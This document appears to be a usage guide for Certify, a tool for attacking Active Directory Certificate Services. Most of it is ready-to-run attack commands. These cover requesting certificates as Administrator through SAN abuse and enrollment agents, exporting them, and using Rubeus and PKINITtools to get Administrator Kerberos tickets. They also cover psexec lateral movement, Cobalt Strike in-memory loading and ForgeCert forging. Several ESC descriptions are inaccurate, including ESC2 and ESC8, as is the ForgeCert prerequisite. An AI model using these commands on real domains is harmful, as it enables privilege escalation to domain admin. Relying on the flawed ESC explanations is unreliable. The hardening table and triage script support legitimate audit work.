Certify

Certify is a .NET tool for enumerating and abusing Active Directory Certificate Services (AD CS) to identify vulnerable certificate templates and misconfigured certification authorities for privilege escalation and lateral movement.

Installation

Compile from Source

Clone the GhostPack repository and compile with Visual Studio:

git clone https://github.com/GhostPack/Certify.git
cd Certify
# Open Certify.sln in Visual Studio 2019/2022
# Build > Build Solution (Release x64)
# Output: Certify.exe in bin/Release/

Precompiled Releases

Download precompiled binaries from the GitHub releases page:

# Extract and execute directly
.\Certify.exe find /vulnerable

Execute-Assembly in Cobalt Strike

Load Certify as a .NET assembly in Cobalt Strike for in-memory execution:

beacon> execute-assembly /path/to/Certify.exe find /vulnerable

Quick Start

Find Vulnerable Templates

# Enumerate all templates and identify those with known vulnerabilities (ESC1-ESC8)
Certify.exe find /vulnerable

Enumerate All CAs

# List all certification authorities in the domain
Certify.exe cas

Enumerate All Templates

# Display all certificate templates available for enrollment
Certify.exe find

Enumeration

Enumerate Certification Authorities

# List all CAs with detailed information
Certify.exe cas

# Output includes:
# - CA Name
# - DN (Distinguished Name)
# - Certificate Subject
# - Web Enrollment support

Enumerate Certificate Templates

# List all available templates with enrollment requirements
Certify.exe find

# Displays:
# - Template Name
# - EKU (Extended Key Usage)
# - Enrollment Rights
# - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag
# - Manager Approval requirement
# - Authorized Signatures

Find Vulnerable Templates

# Identify templates vulnerable to ESC1-ESC8 attacks
Certify.exe find /vulnerable

# Highlights potentially exploitable misconfigurations

Filter by Template Purpose

# Find templates allowing client authentication (ESC1/ESC3)
Certify.exe find /clientauth

# Find templates where enrollee supplies subject (ESC1)
Certify.exe find /enrolleeSuppliesSubject

Enumerate PKI Objects and Permissions

# Display detailed PKI object information including permissions
Certify.exe pkiobjects

# Shows CA access control lists and enrollment agent permissions

Certificate Request

Basic Certificate Request

# Request certificate from specific CA using target template
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User

Subject Alternative Name (SAN) Abuse

# Add alternate principal name (ESC1 exploitation)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /altname:Administrator

# Common targets for SAN abuse:
# /altname:Administrator         # Domain admin user
# /altname:DOMAIN\Administrator  # Fully qualified name
# /altname:krbtgt                # KDC account

On-Behalf-Of Enrollment

# Request certificate on behalf of another user (enrollment agent abuse)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /onbehalfof:DOMAIN\Administrator

Install Certificate After Request

# Install generated certificate in current user's personal store
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install

# Certificate stored in:
# Cert:\CurrentUser\My\[Thumbprint]

Export Certificate to File

# Certify prints the issued certificate and its private key as PEM to the console;
# with /install the key pair is placed in the personal store instead
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install

# Retrieve from certificate store and export as PFX
# (see "Export Certificate to PFX" below)

Vulnerable Template Identification

ESC1: Unrestricted Enrollment + SAN Abuse

Conditions:

  • Template allows any principal to enroll
  • Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set)
  • EKU includes client authentication
  • Manager approval not required

Certify identifies: [!] Enrollee supplies subject

Exploitation: Request cert with /altname:Administrator and use for authentication.

ESC2: Certificate Template Abuse (General Abuse)

Conditions:

  • EKU is ANY_PURPOSE (the certificate can be used for any purpose)
  • Enrollee supplies subject enabled
  • No manager approval

Certify identifies: [!] ANY_PURPOSE EKU

Exploitation: Request cert for arbitrary use cases (authentication, signing, encryption).

ESC3: Enrollment Agent Abuse

Conditions:

  • Enrollment Agent template allows unrestricted enrollment
  • Any principal can request as another user
  • Target user's template allows enrollment

Certify identifies: [!] Enrollment Agent template + enrollment rights mismatch

Exploitation: Use /onbehalfof to request certs for high-privilege users.

ESC4: Misconfigured Certificate Template Permissions

Conditions:

  • Low-privileged user has ModifyTemplate rights
  • Can modify template settings to create vulnerability
  • Change EKU, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, permissions

Certify identifies: Template permissions via pkiobjects

Exploitation: Modify template then request exploitable certificate.

ESC5: Vulnerable PKI Object Permissions

Conditions:

  • Low-privileged user has dangerous permissions over CA/templates
  • FullControl, Write, WriteDacl on PKI objects
  • Can modify CA configuration or template settings

Certify identifies: via pkiobjects + low-priv user with ACE

Exploitation: Modify template CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or CA settings.

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag

Conditions:

  • CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
  • Allows client-supplied SubjectAltName in requests
  • Default template allows any user to request

Certify identifies: [!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled

Exploitation: Request cert with arbitrary SAN on any template.

ESC7: Vulnerable CA Access Control

Conditions:

  • Low-privileged user has dangerous permissions (Manage Certificates, etc.)
  • Can approve/deny pending requests
  • Can configure CA settings

Certify identifies: via pkiobjects + ACL review

Exploitation: Approve own requests, modify CA configuration.

ESC8: Web Enrollment Enabled

Conditions:

  • CA has web enrollment service enabled
  • Accessible without authentication or with weak auth
  • No request validation

Certify identifies: [+] Web Enrollment Enabled

Exploitation: Submit request directly via HTTP without strong auth.

CA Enumeration Details

CA Permissions and Access Control

# Review CA access control lists
Certify.exe pkiobjects

# Look for:
# - Low-privileged users with "Manage Certificates"
# - Non-admin users with CA access
# - Enrollment agent permissions

EDITF Flags

# CA with EDITF_ATTRIBUTESUBJECTALTNAME2 allows client-supplied SANs
# This creates ESC6 vulnerability if any template allows unrestricted enrollment

Certify.exe cas
# Look for "[!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled"

Web Enrollment Endpoints

# Check for enabled web enrollment service
Certify.exe cas

# Web enrollment typically hosted at:
# http://CA-SERVER/certsrv/
# https://CA-SERVER/certsrv/

# Request certificate via HTTP POST if authentication is weak/missing

Template Analysis

Understanding Certify Output

[+] Template Name: User
    [+] Template Schema Version: 2
    [+] Display Name: User
    [+] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com
    [+] Enrollment Rights:
        Authenticated Users - Full (2032)
    [+] EKU: Client Authentication, Email Protection
    [+] Enrollee Supplies Subject: True
    [+] Manager Approval: False
    [+] Requires Authorized Signatures: 0
    [+] Authorized Signatures: 
    [+] CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: True

Key Fields

Field                               Meaning
----------------------------------  -----------------------------------------------------------------
Enrollee Supplies Subject           User can specify certificate subject/SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT   Certificate template flag enabling the above
EKU                                 Extended Key Usage (Client Auth, Server Auth, Code Signing, etc.)
Enrollment Rights                   Which principals can request from this template
Manager Approval                    Requires CA manager to approve request
Authorized Signatures               Number of authorized signatures required
ANY_PURPOSE                         Dangerous EKU allowing any usage

Dangerous Configurations

[!] Enrollee supplies subject
[!] Any principal can enroll
[!] Client Authentication EKU present
[!] Manager Approval: False
[!] Authorized Signatures: 0

# All together = ESC1 vulnerability
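As an added example (not part of Certify or the original page), the following Python script applies the ESC1 rule above to Certify-style find output, so an auditor can triage a large template listing instead of reading it by hand. The sample output is constructed, and the lists of broad principals and logon-capable EKUs (ANY_PURPOSE is counted because it covers client authentication) are assumptions.

```python
import re
# Constructed sample in the shape of Certify "find" output (not real enumeration data).
SAMPLE = """\
[+] Template Name: User
    [+] Enrollment Rights:
        Authenticated Users - Full (2032)
    [+] EKU: Client Authentication, Email Protection
    [+] Enrollee Supplies Subject: True
    [+] Manager Approval: False
    [+] Requires Authorized Signatures: 0

[+] Template Name: WebServer
    [+] Enrollment Rights:
        DOMAIN\\Web Admins - Full (2032)
    [+] EKU: Server Authentication
    [+] Enrollee Supplies Subject: True
    [+] Manager Approval: False
    [+] Requires Authorized Signatures: 0
"""
# Assumed lists: principals treated as "any principal", and EKUs usable for logon.
BROAD_PRINCIPALS = ("authenticated users", "domain users", "domain computers", "everyone")
AUTH_EKUS = ("client authentication", "any purpose", "smart card logon", "pkinit client authentication")

def parse_templates(text):
    # One dict per template; indented lines under "Enrollment Rights:" become 'rights'.
    templates, cur = [], None
    for line in text.splitlines():
        m = re.match(r"\s*\[\+\] ([^:]+):\s*(.*)$", line)
        if m:
            key, val = m.group(1).strip(), m.group(2).strip()
            if key == "Template Name":
                cur = {"name": val, "rights": []}
                templates.append(cur)
            elif cur is not None:
                cur[key] = val
        elif cur is not None and line.strip():
            cur["rights"].append(line.strip())  # continuation of Enrollment Rights
    return templates

def esc1_checks(t):
    """Evaluate each ESC1 condition from the page for one parsed template."""
    ekus = [e.strip().lower() for e in t.get("EKU", "").split(",") if e.strip()]
    return {
        "any principal can enroll": any(p in r.lower() for r in t["rights"] for p in BROAD_PRINCIPALS),
        "enrollee supplies subject": t.get("Enrollee Supplies Subject") == "True",
        "client auth EKU": any(e in AUTH_EKUS for e in ekus),
        "no manager approval": t.get("Manager Approval") == "False",
        "no authorized signatures": t.get("Requires Authorized Signatures") == "0",
    }

def triage(text):
    # Template name -> True only when all ESC1 conditions hold together.
    return {t["name"]: all(esc1_checks(t).values()) for t in parse_templates(text)}
```

Templates that fail only one condition (here WebServer, with a narrow enrollment group and a non-logon EKU) are the ones worth keeping an eye on, since a single permission or EKU change turns them into ESC1.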

Certificate Installation and Usage

Export Certificate to PFX

# From certificate store to file
$cert = Get-ChildItem Cert:\CurrentUser\My\[Thumbprint]
$password = ConvertTo-SecureString -String "password" -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath cert.pfx -Password $password

Convert PFX to Rubeus Format

# Install openssl or use WSL
openssl pkcs12 -in cert.pfx -out cert.pem -nodes -passin pass:password

# Load into Rubeus for Kerberos authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pem /createnetonly:C:\Windows\System32\cmd.exe

Pass-the-Cert Attack

# Use certificate for authentication without plaintext password
# Via Rubeus PKINIT
Rubeus.exe asktgt /user:Administrator /certificate:C:\path\to\cert.pfx /password:certpassword /createnetonly:C:\Windows\System32\cmd.exe

# Spawns process with TGT for Administrator
# Use for lateral movement and persistence

PKINIT and Kerberos

# PKINITtools - Kerberos authentication via certificate
# Requires certificate with Client Authentication EKU

# Request TGT using certificate identity
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password domain.com/Administrator administrator.ccache

# Use ccache for lateral movement
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET

Troubleshooting

"Access Denied" During Enumeration

# Running as non-domain-joined user or unauthenticated
# Ensure domain connectivity and valid credentials

# Run as domain user:
runas /user:DOMAIN\username cmd.exe
# Then execute Certify.exe

No Vulnerable Templates Found

# May indicate:
# 1. Templates properly secured (no ESC conditions)
# 2. Organization hardened against ADCS attacks
# 3. Limited template visibility for current user

# Review all templates regardless:
Certify.exe find
# Manually analyze based on ESC conditions above

Certificate Request Denied

# Reasons:
# - Insufficient enrollment rights
# - Template requires manager approval (pending request)
# - CA configured to deny certain principals

# Check enrollment rights:
Certify.exe find /template:TemplateName
# Review "Enrollment Rights" output

Web Enrollment 404 or Unavailable

# CA web enrollment service not running or disabled
# Fallback to direct CA RPC interface

# Certify uses RPC by default, web enrollment is optional
# Check CA configuration for enabled services

Best Practices

Practice                  Description
------------------------  ----------------------------------------------------------------
Review All Templates      Run Certify.exe find and manually review against ESC conditions
Monitor Enrollments       Track certificate requests on CAs for suspicious activity
Restrict SAN Abuse        Disable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on sensitive templates
Enforce Approvals         Require manager approval for privileged templates
Limit Enrollment Rights   Restrict principals able to enroll (not Authenticated Users)
Disable EDITF Flags       Review and remove unnecessary EDITF_* flags on CAs
RBAC on PKI Objects       Limit template modification and CA access to admins
Certificate Auditing      Monitor issued certificates for anomalies
EKU Restrictions          Use specific EKUs (not ANY_PURPOSE)

Integration

Certipy (Python)

# Python ADCS enumeration and exploitation
certipy find -u user@domain.com -p password -dc-ip 10.0.0.1
certipy req -u user@domain.com -p password -ca CA-NAME -template User

ForgeCert

# Forge certificates without CA interaction
# Requires NTLM hash of CA account
ForgeCert.exe --CaCert ca-cert.cer --CaKey ca-key.key --Subject CN=Administrator

Rubeus

# Kerberos manipulation and PKINIT authentication
# Integrated with certificate-based authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx

PKINITtools

# Kerberos PKINIT support and certificate-based auth
# Cross-platform (Python/Linux)
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password DOMAIN/Administrator administrator.ccache

Certutil (Native Windows)

# Native Windows utility for certificate operations; retrieve the CA certificate
certutil -config "CA-SERVER.domain.com\CA-NAME" -ca.cert ca-cert.cer

# Check that the CA is reachable
certutil -config "CA-SERVER.domain.com\CA-NAME" -ping